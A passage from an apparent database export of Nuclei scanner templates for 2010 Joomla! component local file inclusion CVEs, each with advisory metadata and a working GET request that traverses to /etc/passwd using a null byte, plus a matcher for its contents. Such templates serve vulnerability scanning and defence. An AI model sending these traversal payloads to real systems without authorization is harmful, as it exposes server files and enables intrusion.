(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12288\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1953\n - http://www.vupen.com/english/advisories/2010/0927\n - http://www.exploit-db.com/exploits/12288\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1953\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.93171\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_multimap\n tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022038e7b2689d93babc89559d2862b8bc5b183cad389c6e2fed0700cefd3cf3dfdd022100fd31164f65dbbcb7da90ab8bfdc92b82e66296933e903952cbca8a4182cc9e4e:922c64590222798bb761d5b6d8e72950", "hash": "1481bccde9c5e6b1f05b5fcedb56c112", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eac" }, "name": "CVE-2010-1954.yaml", "content": "id: CVE-2010-1954\n\ninfo:\n name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12287\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1954\n - http://www.exploit-db.com/exploits/12287\n - http://www.vupen.com/english/advisories/2010/0928\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1954\n cwe-id: CWE-22\n epss-score: 0.05684\n epss-percentile: 0.92564\n cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlacomponent.inetlanka\n product: com_multiroot\n tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f769f8a1c52b5139073110e5b1bc3a484baee903ba1809561054e734c9d3d59c022100a4b510ea0025aba39b8dd61d5873bb5a47fbd790635549a7cc6e85c770f691d0:922c64590222798bb761d5b6d8e72950", "hash": "acb15ecc6f0594bd5ace8c896c436f2e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ead" }, "name": "CVE-2010-1955.yaml", "content": "id: CVE-2010-1955\n\ninfo:\n name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12238\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1955\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1955\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_blogfactory\n tags: cve,cve2010,lfi,edb,joomla,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b23a4aac6fedfb37e15cc43e7f51bf59ba413a099ae58090b05ee9be66d60314022100cfad298dd85b0b1b0cb1046b79e4e8822f005cb18b4081f3c898c3397cdbcc31:922c64590222798bb761d5b6d8e72950", "hash": "ae1f0d52362285cb32f98a1b44fa9592", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eae" }, "name": "CVE-2010-1956.yaml", "content": "id: CVE-2010-1956\n\ninfo:\n name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12285\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1956\n - http://www.exploit-db.com/exploits/12285\n - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html\n - http://www.vupen.com/english/advisories/2010/0930\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1956\n cwe-id: CWE-22\n epss-score: 0.06055\n epss-percentile: 0.92761\n cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_gadgetfactory\n tags: cve,cve2010,joomla,lfi,edb,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206e67b1c6317d9843ab60b722ade0f0942e4913d7c3f5630b1c8d19483f638f0c0221009162ad1fcb96f2a504a7f16e9805bc854997ba06eeb3c61adedbf42d4225287e:922c64590222798bb761d5b6d8e72950", "hash": "5b3c2ce2d42e139ef016ee936a16f0b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eaf" }, "name": "CVE-2010-1957.yaml", "content": "id: CVE-2010-1957\n\ninfo:\n name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12235\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1957\n - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1957\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.87378\n cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thefactory\n product: com_lovefactory\n tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d140e4c1bf958b49625695ac09664cf37de408e74bc9902c319f6646d10d4de2022100e65a364df1072baccbf87a339592e9ecdd95de20e8dd4b705484ea97dafb2f70:922c64590222798bb761d5b6d8e72950", "hash": "47804f346f61c71fc4c4e1506ddeab1a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb0" }, "name": "CVE-2010-1977.yaml", "content": "id: CVE-2010-1977\n\ninfo:\n name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12083\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1977\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1977\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80059\n cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gohigheris\n product: com_jwhmcs\n tags: cve2010,cve,edb,joomla,lfi,gohigheris\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022040f7d241d5e5a884c1963854465cf4831f51f493d326d327351a68621b8ebc3e022100d1c7c3b472c326444bc1b1dd290db71df1dd2cade4f6d02d0d16e10f68ab869b:922c64590222798bb761d5b6d8e72950", "hash": "d362ebb8b9534fdb380091b33647a01c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb1" }, "name": "CVE-2010-1979.yaml", "content": "id: CVE-2010-1979\n\ninfo:\n name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12088\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1979\n - http://www.exploit-db.com/exploits/12088\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57570\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1979\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.81565\n cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: affiliatefeeds\n product: com_datafeeds\n tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 480a00453043021f4fb71b63c3bd17e13086007edddf0deeb7717685fefb075a4fd05cc9745216022078dacb5768e7279c9408bceebe738d0d2ec037568513077d54f5acd5353b1920:922c64590222798bb761d5b6d8e72950", "hash": "f82100b61fe5196cca0b3431cc7e38e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb2" }, "name": "CVE-2010-1980.yaml", "content": "id: CVE-2010-1980\n\ninfo:\n name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12085\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1980\n - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt\n - http://www.exploit-db.com/exploits/12085\n - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1980\n cwe-id: CWE-22\n epss-score: 0.02401\n epss-percentile: 0.88823\n cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberto_aloi\n product: com_joomlaflickr\n tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f0601e14c88048f753466cb392bb15f315e270c83bea437c0c06416a294fae7022100c65c6038a18d80ebceddf7ddda1f30c914cb549720e81c05d46adaa1e145e889:922c64590222798bb761d5b6d8e72950", "hash": "6b6b351d9e621327c7d060be1851db0e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb3" }, "name": "CVE-2010-1981.yaml", "content": "id: CVE-2010-1981\n\ninfo:\n name: Joomla! Component Fabrik 2.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12087\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1981\n - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt\n - http://www.exploit-db.com/exploits/12087\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1981\n cwe-id: CWE-22\n epss-score: 0.00656\n epss-percentile: 0.77311\n cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: fabrikar\n product: fabrik\n framework: joomla\\!\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\\!\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100eb093037fb061176dd3b11eb61772ebd05a8d5e6b7b77b7c78f9e104162f8085022100d573cfc124ecec2594c14755043485055a53bf9712c250c00c5bfcacabe64cee:922c64590222798bb761d5b6d8e72950", "hash": "b49f25ab6bc1ad980e34b7aa64523daa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb4" }, "name": "CVE-2010-1982.yaml", "content": "id: CVE-2010-1982\n\ninfo:\n name: Joomla! Component JA Voice 2.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12121\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1982\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1982\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73222\n cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlart\n product: com_javoice\n tags: cve,cve2010,joomla,lfi,edb,joomlart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950", "hash": "a6b2ea82de55f50d14266b6a467f3e4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb5" }, "name": "CVE-2010-1983.yaml", "content": "id: CVE-2010-1983\n\ninfo:\n name: Joomla! Component redTWITTER 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. 
(dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12055\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1983\n - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt\n - http://www.exploit-db.com/exploits/12055\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1983\n cwe-id: CWE-22\n epss-score: 0.01815\n epss-percentile: 0.87898\n cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redcomponent\n product: com_redtwitter\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100da8e5ec0db4b337d02f25af0f867f89b847da04714f68f22e6be3b3be3f0abd40220060b76f49c5ea887ceb19ee81f19d9fb8153e344b22d53416492d8c1e1a99058:922c64590222798bb761d5b6d8e72950", "hash": "073bfaf781c6bfc2ee596c3acba38811", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb6" }, "name": "CVE-2010-2033.yaml", "content": "id: CVE-2010-2033\n\ninfo:\n name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2033\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2033\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchacategoriestree\n tags: cve,cve2010,packetstorm,joomla,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c3752555bc7d339bf2c1724f079f24b3c89ea951d0df72c818784b0d6244d56b022100cb11f24b74cd4d7293908f618984904a38f18e87bd8f90ad95611e6724d742a3:922c64590222798bb761d5b6d8e72950", "hash": "5b69c0c84ce1be2d3edc315f906cacf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb7" }, "name": "CVE-2010-2034.yaml", "content": "id: CVE-2010-2034\n\ninfo:\n name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34003\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2034\n - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2034\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchaimageattach\n tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203cc78169b7508d700ed726459776192de58dce4c12f877eb75653e67d8a63eb5022100d30e6a81d09d27b9a6ad73fe191f8bab5e7644a12639ed94e2a03a2db3b04d1f:922c64590222798bb761d5b6d8e72950", "hash": "624ea4a73d5ad83537089671934dbb78", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb8" }, "name": "CVE-2010-2035.yaml", "content": "id: CVE-2010-2035\n\ninfo:\n name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34006\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2035\n - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2035\n cwe-id: CWE-22\n epss-score: 0.07071\n epss-percentile: 0.93832\n cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchagallery\n tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb5ec476643b95c64caa86cc061308c75ceace843e58db8bae08413f2160846602201dc89742c9b1a55df817ec772150de1c14e53494415f3a1e177701a94db23fb4:922c64590222798bb761d5b6d8e72950", "hash": "5e35cb9dee99de40e3ac8caa6c562a39", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb9" }, "name": "CVE-2010-2036.yaml", "content": "id: CVE-2010-2036\n\ninfo:\n name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34004\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2036\n - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2036\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchafieldsattach\n tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950", "hash": "d62196dc6e3eb48286d92ad154695b3d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eba" }, "name": "CVE-2010-2037.yaml", "content": "id: CVE-2010-2037\n\ninfo:\n name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. 
(dot dot) in the controller parameter to index.php.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34005\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2037\n - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2037\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchadownloadsattach\n tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950", "hash": "6626e24d32fd9c454778b92e5ab70941", "level": 5, "time": 